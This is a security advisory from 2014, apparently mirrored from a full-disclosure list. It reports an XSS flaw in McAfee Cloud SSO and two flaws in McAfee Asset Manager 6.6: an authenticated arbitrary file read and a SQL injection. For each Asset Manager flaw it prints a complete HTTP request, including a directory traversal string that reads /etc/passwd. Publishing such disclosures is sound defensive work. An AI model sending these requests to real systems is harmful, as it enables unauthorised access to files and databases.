McAfee Cloud SSO and McAfee Asset Manager vulns

2014.03.18
Credit: Brandon Perry
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

1. Cloud SSO is vuln to unauthed XSS in the authentication audit form: 2. 1. https://twitter.com/BrandonPrry/status/445969380656943104 2. 1. 2. McAfee Asset Manager v6.6 multiple vulnerabilities 3. 4. http://www.mcafee.com/us/products/asset-manager.aspx 5. 6. Authenticated arbitrary file read 7. An unprivileged authenticated user can download arbitrary files with the permissions of the web server using the report download functionality. By generating a report, the user's browser will make a request to /servlet/downloadReport?reportFileName=blah. The user can put in a relative directory traversal attack and download /etc/passwd. 8. 9. GET /servlet/downloadReport?reportFileName=../../../../../../../../etc/passwd&format=CSV HTTP/1.1 10. Host: 172.31.16.167 11. User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 12. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 13. Accept-Language: en-US,en;q=0.5 14. Accept-Encoding: gzip, deflate 15. Referer: https://172.31.16.167/Inventory?filterColumns=&curViewId=-1&maintainQuery=true&format=search&collectorId=null&criticality=0&pageNum=1&location=Inventory&viewSelect=-999999&filterValueField=&orderBy=FIREWALLED&orderBy2=SITE&orderBy3=CRITICALITY_NAME&wsz=200&wszCtrl_1=200&action=AUDIT_REDISCOVER&formatSelect= 16. Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554 17. Connection: keep-alive 18. 19. 20. 21. 22. 23. Authenticated SQL injection 24. An unprivileged authenticated user can initiate a SQL injection attack by creating an audit report and controlling the username specified in the audit report. In the below request, the 'user' parameter is susceptible to the SQL injection: 25. 26. POST /jsp/reports/ReportsAudit.jsp HTTP/1.1 27. Host: 172.31.16.167 28. User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 29. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 30. Accept-Language: en-US,en;q=0.5 31. Accept-Encoding: gzip, deflate 32. Referer: https://172.31.16.167/jsp/reports/ReportsAudit.jsp 33. Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554 34. Connection: keep-alive 35. Content-Type: application/x-www-form-urlencoded 36. Content-Length: 91 37. 38. fromDate=03-19-2014&toDate=03-19-2014&freetext=&Severity=0&AuditType=12&user=Administrator -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website

References:

http://seclists.org/fulldisclosure/2014/Mar/325


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top